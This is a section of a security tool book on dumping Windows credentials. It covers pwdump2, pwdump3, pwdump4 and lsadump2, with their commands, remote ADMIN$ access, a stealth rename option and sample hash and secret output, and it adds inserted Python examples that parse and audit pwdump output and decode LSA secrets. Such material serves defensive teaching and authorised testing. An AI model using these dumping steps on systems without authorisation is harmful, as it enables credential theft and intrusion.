GRABBING WINDOWS PASSWORD HASHES

After reviewing the L0phtCrack section of this chapter, it's apparent that Windows password hashes can be viewed by the administrator just as easily as a Unix administrator can view the /etc/shadow file. The difference is that the Unix /etc/shadow file is plain text that can be opened in any text editor or simply output to the screen, whereas the Windows SAM database is a binary format that does not lend itself to easy inspection. This is why we need tools such as pwdump or lsadump to produce a text version of the SAM database.

Pwdump

Pwdump2, http://www.openwall.com/passwords/nt.shtml, by Todd Sabin, can be used to extract the hashed passwords from a Windows system. It is a command-line tool that must be run locally on the target system; however, we'll take a look at pwdump3, which can operate remotely, later in this section.

Implementation

The program must be run locally on the system. This is version 2 of a tool first developed by Jeremy Allison of the Samba project. Unlike the first version, pwdump2 is not inhibited by SysKey encryption of the SAM database. SysKey was introduced in Windows NT in an attempt to add additional security to the SAM database, but its effectiveness is questionable, as we will see with pwdump2. The usage for pwdump2 is shown here:

 C:\>pwdump2.exe /?
 Pwdump2 - dump the SAM database.
 Usage: pwdump2.exe <pid of lsass.exe>

It must be run with Administrator privileges in order to obtain the password hashes:

 C:\>pwdump2.exe
 Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa46...
 Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c...
 skycladgirl:1013:aa5536a42ebe131baad3b235b51404ee:db31a1ee00bfbee...

You do not usually have to provide the process ID (PID) of lsass.exe. If you do need it, there are simple ways to find it: pipe the output of tlist or pulist through the find command (the /i option instructs find to ignore case), or simply look in Task Manager with the PID column selected for display.

 C:\>tlist | find /i "lsass"
  244 LSASS.EXE
 C:\>pulist | find /i "lsass"
 LSASS.EXE         244  NT AUTHORITY\SYSTEM
 C:\>pwdump2.exe 244
 Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa46...
 Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c...
 skycladgirl:1013:aa5536a42ebe131baad3b235b51404ee:db31a1ee00bfbee...

The only drawback with the output from pwdump2 is that L0phtCrack cannot read it. The sole reason is that the alphabetic characters in the hashes are lowercase, and L0phtCrack expects them to be uppercase. John the Ripper accepts either case, but for L0phtCrack we must massage the data into an acceptable format.

Fortunately, the tr (translate characters) utility will set this right for those who wish to use the GUI cracker. tr is standard on Unix systems and in Cygwin, and it has been ported to Windows as part of the Resource Kit.

 [user@hediwg ]$ cat pwdump.out | tr a-z A-Z
 ADMINISTRATOR:500:F1E5C5EFBC8CFB7F18136FB05F77A0BF:55C77B761FFA46...
 ORC:501:CBC501A4D2227783CBC501A4D2227783:F523558E22C95C62A6D6D00C...
 SKYCLADGIRL:1013:AA5536A42EBE131BAAD3B235B51404EE:DB31A1EE00BFBEE...
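The tr step above only changes case. As an added example (not code from the book or from the pwdump tools), the Python below does the same normalisation but also validates each record and reads what the hashes themselves reveal before any cracking starts: whether the LM hash is stored at all, whether its second half is the well-known empty-LM value (password of 7 characters or fewer), and whether the NT hash is the well-known empty-password value. The sample lines are constructed: the user names and RIDs follow the book's pwdump2 output, but the hash values are made-up full-length strings, since the book's are truncated with "...".

```python
"""Normalise pwdump-style output and audit it for weak hash storage.

Added example; not code from the book or from the pwdump tools. It reads the
`user:rid:lmhash:nthash[:::]` lines that pwdump2/3/4 emit, uppercases them the
way the `tr a-z A-Z` step does, and reports what the hashes reveal.
"""
import re

HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

# Well-known constants: the LM hash of an empty (or disabled) LM password and
# the NT hash of an empty password.
LM_EMPTY = "AAD3B435B51404EEAAD3B435B51404EE"
LM_HALF_EMPTY = LM_EMPTY[:16]   # LM hashes are two independent 7-character halves
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Constructed sample: names and RIDs follow the book's pwdump2 output, the
# hash values are made up (the book's are truncated with "...").
SAMPLE = """\
Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa4600ab3e0b1e2c1d4a9f:::
Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c3f6c1234:::
skycladgirl:1013:aad3b435b51404eeaad3b435b51404ee:db31a1ee00bfbee0123456789abcdef0:::
svc_backup:1020:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump_line(line):
    """Return {'user', 'rid', 'lm', 'nt'} for a well-formed record, else None.

    Truncated lines (as printed in the book) and banner text fail the
    32-hex-digit check and are skipped instead of becoming bad cracker input.
    """
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    user, rid, lm, nt = parts[:4]
    if not rid.isdigit() or not HEX32.match(lm) or not HEX32.match(nt):
        return None
    return {"user": user, "rid": int(rid), "lm": lm.upper(), "nt": nt.upper()}


def to_l0phtcrack(lines):
    """Uppercase valid records, matching what `tr a-z A-Z` produces."""
    out = []
    for line in lines:
        rec = parse_pwdump_line(line)
        if rec is not None:
            out.append(f"{rec['user'].upper()}:{rec['rid']}:{rec['lm']}:{rec['nt']}:::")
    return out


def audit(lines):
    """List (user, finding) pairs a defender would act on before cracking."""
    findings = []
    for line in lines:
        rec = parse_pwdump_line(line)
        if rec is None:
            continue
        user, lm, nt = rec["user"], rec["lm"], rec["nt"]
        if nt == NT_EMPTY:
            findings.append((user, "blank password"))
        if lm != LM_EMPTY:
            findings.append((user, "LM hash stored"))
            if lm[16:] == LM_HALF_EMPTY:
                findings.append((user, "password is 7 characters or fewer"))
            elif lm[:16] == lm[16:]:
                findings.append((user, "LM halves identical (same 7-char block twice)"))
        if rec["rid"] == 500 and user.lower() != "administrator":
            findings.append((user, "built-in Administrator (RID 500) renamed"))
    return findings


if __name__ == "__main__":
    lines = SAMPLE.splitlines()
    print("\n".join(to_l0phtcrack(lines)))
    for user, finding in audit(lines):
        print(f"{user}: {finding}")
```

Unlike tr, this drops records whose hashes are not exactly 32 hex digits, so a truncated or partially captured dump is reported as missing rather than fed to the cracker in a broken form.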

Pwdump3

Pwdump3, http://www.openwall.com/passwords/nt.shtml, by Phil Staubs, expanded the pwdump tool once more by adding remote access to a victim machine. There is even a version, pwdump3e, that encrypts remote connections to prevent malicious users from sniffing sensitive passwords. The usage for pwdump3e differs slightly:

 Usage: PWDUMP3 machineName [outputFile] [userName]
 C:\>PwDump3.exe victim pwdump.out root
 C:\>type pwdump.out
 guest:1001:NO PASSWORD*********************:2DEAC3223C70B24E90F02...
 wwwadmin:500:NO PASSWORD*********************:9CBD10B05F8E69B62F2...
 IUSR_WWW01:1003:6E72211CDC51C9F8EB9293C3135F3985:0E2A2DCE3B6ABFBA...

For pwdump3 to work correctly, you need to be able to establish a session to the ADMIN$ share. Pwdump3 will do this for you and prompt you for the administrator password. Otherwise, you could set up a manual session to the ADMIN$ share with the net command:

 C:\>net use \\victim\admin$ * /u:Administrator
 Type the password for \\localhost\admin$:
 The command completed successfully.

Pwdump4

Pwdump4 was written to address some shortcomings of pwdump3. You can grab a binary and source version from the OpenWall (John the Ripper) web site, http://www.openwall.com/passwords/nt.shtml. It uses the same technique as its nominal predecessor, pwdump3, but improves the usability when dealing with other character sets and when the ADMIN$ share is not available.

Implementation

The pwdump4 command line closely resembles its peers.

 C:\tools>PWDump4.exe
 PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
     by bingle@email.com.cn
 This program is free software based on pwpump3 by Phil Staubs
 under the GNU General Public License Version 2.
 Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]

Each option is described in Table 8-1.

Table 8-1: Pwdump4 Command-line Options

Option          Description
Target          Target computer's IP address or hostname. For localhost use /l.
/l              Targets the local computer. This uses the pwdump2 method of
                dumping hashes rather than the pwdump3 method.
/s:share        By default pwdump4 attempts to access ADMIN$ (as does
                pwdump3). Specify an alternate share over which to attempt
                remote access.
/o:outputFile   Saves results to outputFile.
/u:userName     Connects to the share as userName. You will be prompted for
                the password.
/r:newname      Renames the pwdump service and the files copied to the
                remote computer to newname. This provides very basic stealth.

Probably the most useful feature is the /s option. This enables you to target remote systems for which ADMIN$ is inaccessible, but some other share is accessible. Another by-product of this additional feature is that remote registry access is no longer a requirement. pwdump4 will try to communicate over named pipes (such as via the IPC$ share).

Here is a final tip for users trying to run pwdump4 inside a remote desktop connection. If you execute the command against localhost with the /l option, you'll likely receive an error along the lines of SRV>Status: CreateRemoteThread failed: 8. In this case, simply specify localhost as the target and have pwdump4 access the ADMIN$ share (or whichever share you find available).

 C:\tools>PWDump4.exe localhost /o:err.txt
 PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.
     by bingle@email.com.cn
 This program is free software based on pwpump3 by Phil Staubs
 under the GNU General Public License Version 2.
 local path of \\localhost\ADMIN$ is: C:\WINDOWS
 connect to localhost for result, plz wait...
 SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal
 LSA>Samr Enumerate 6 Users In Domain WIN2K3-WEB.
 All Completed.

Lsadump2

Lsadump2, http://www.bindview.com/Services/RAZOR/Utilities/Windows/lsadump2_readme.cfm, makes the password-harvesting process trivial. Another useful tool by Todd Sabin, it's an update to an original tool created by Paul Ashton. The difference between lsadump2 and the pwdump tool suite is that lsadump2 dumps the plaintext password instead of the password hash. Obviously, this is preferable, since you won't have to run any password-cracking utilities. Unfortunately, lsadump2 only retrieves a password if it is currently being stored in memory by the Local Security Authority (LSA). This could happen when web applications connect to SQL databases or when a backup utility connects to the system remotely in order to archive files.

Implementation

Lsadump2 requires Administrator access to run. The usage for lsadump2 is shown here:

 C:\>lsadump2.exe
 Lsadump2 - dump an LSA secret.
 Usage: lsadump2.exe <pid of lsass.exe> <secret>

You will have to determine the PID of lsass.exe (just as with pwdump2):

 C:\>tlist | find /i "lsass"
  244 LSASS.EXE
Tip 

The PID for the LSA process is also stored in the registry under the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LsaPid.

This tool actually outputs the plaintext "secret" for security-related processes currently in memory. This secret might be the password used by a service account, phone number information for RAS services, or remote backup utility passwords. The output is formatted in two columns:

 aspnet_WP_PASSWORD
  61 00 77 00 41 00 39 00 65 00 68 00 68 00 61 00  a.w.A.9.e.h.h.a.
  4B 00 38 00                                      K.8.

The left column represents the raw hexadecimal values of the secret. The right column contains the printable ASCII representation of the same data. If you have recently installed the .NET services on your Windows 2000 system, then you most likely have an ASPNET user. Lsadump2 has kindly revealed the password for that user (the aspnet_WP_PASSWORD secret above). Note that Windows stores these secrets as Unicode strings with two bytes per character, which is why there is a null byte (00) after each letter. Luckily, the default settings for this user do not permit it to log in remotely or execute commands.
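To make the two-column format concrete, here is an added example (not code from the book or from lsadump2) that parses a dump like the one above back into bytes and decodes each secret as the UTF-16LE string Windows stores, which is where the 00 after every letter comes from. The first secret is the one printed in the book; _SC_BackupAgent is a constructed second secret (Windows names the LSA secrets holding service-account passwords _SC_<servicename>). The parser relies on the hex column being separated from the printable column by at least two spaces, so a printable column that happens to contain hex-looking pairs is never misread as data, and a secret that is not valid UTF-16 (odd length or unpaired surrogates) is reported as hex rather than crashing the run.

```python
"""Parse lsadump2's two-column output and decode the UTF-16LE strings.

Added example; not code from the book or from lsadump2. The first secret is
the one printed in the book; `_SC_BackupAgent` is a constructed second secret
(LSA secrets holding service-account passwords are named _SC_<servicename>).
"""
import re

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")

# Constructed sample in the book's layout: secret name in column 0, then
# indented lines of hex bytes, two or more spaces, and the printable column.
SAMPLE = """\
aspnet_WP_PASSWORD
 61 00 77 00 41 00 39 00 65 00 68 00 68 00 61 00  a.w.A.9.e.h.h.a.
 4B 00 38 00                                      K.8.
_SC_BackupAgent
 42 00 34 00 63 00 6B 00 75 00 70 00 21 00        B.4.c.k.u.p.!.
"""


def parse_lsadump2(text):
    """Return {secret_name: raw_bytes} from lsadump2-style output.

    Only the hex column is read; the printable column is discarded because it
    replaces non-printable bytes with '.' and so cannot reproduce the data.
    """
    secrets = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():           # a name line starts a new secret
            current = raw.strip()
            secrets[current] = bytearray()
            continue
        if current is None:
            raise ValueError("data line before any secret name")
        hex_column = raw.lstrip().split("  ", 1)[0]   # stop at the double space
        for tok in hex_column.split():
            if not HEX_BYTE.match(tok):
                raise ValueError(f"unexpected token {tok!r} in hex column")
            secrets[current].append(int(tok, 16))
    return {name: bytes(data) for name, data in secrets.items()}


def decode_secret(data):
    """Decode an LSA secret as UTF-16LE (two bytes per character, hence the 00
    after every ASCII letter); trailing NULs are dropped."""
    return data.decode("utf-16-le").rstrip("\x00")


def decoded_secrets(text):
    """Map each secret name to its decoded string, or to hex if it is not text."""
    out = {}
    for name, data in parse_lsadump2(text).items():
        try:
            out[name] = decode_secret(data)
        except UnicodeDecodeError:
            out[name] = data.hex()
    return out


if __name__ == "__main__":
    for name, value in decoded_secrets(SAMPLE).items():
        print(f"{name}: {value}")
```

Run stand-alone it prints each secret name with its decoded value; the same functions can be pointed at a saved lsadump2 output file to check which service accounts have their credentials resident in the LSA.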



Anti-Hacker Tool Kit, Third Edition
ISBN: 0072262877
Year: 2006
Pages: 175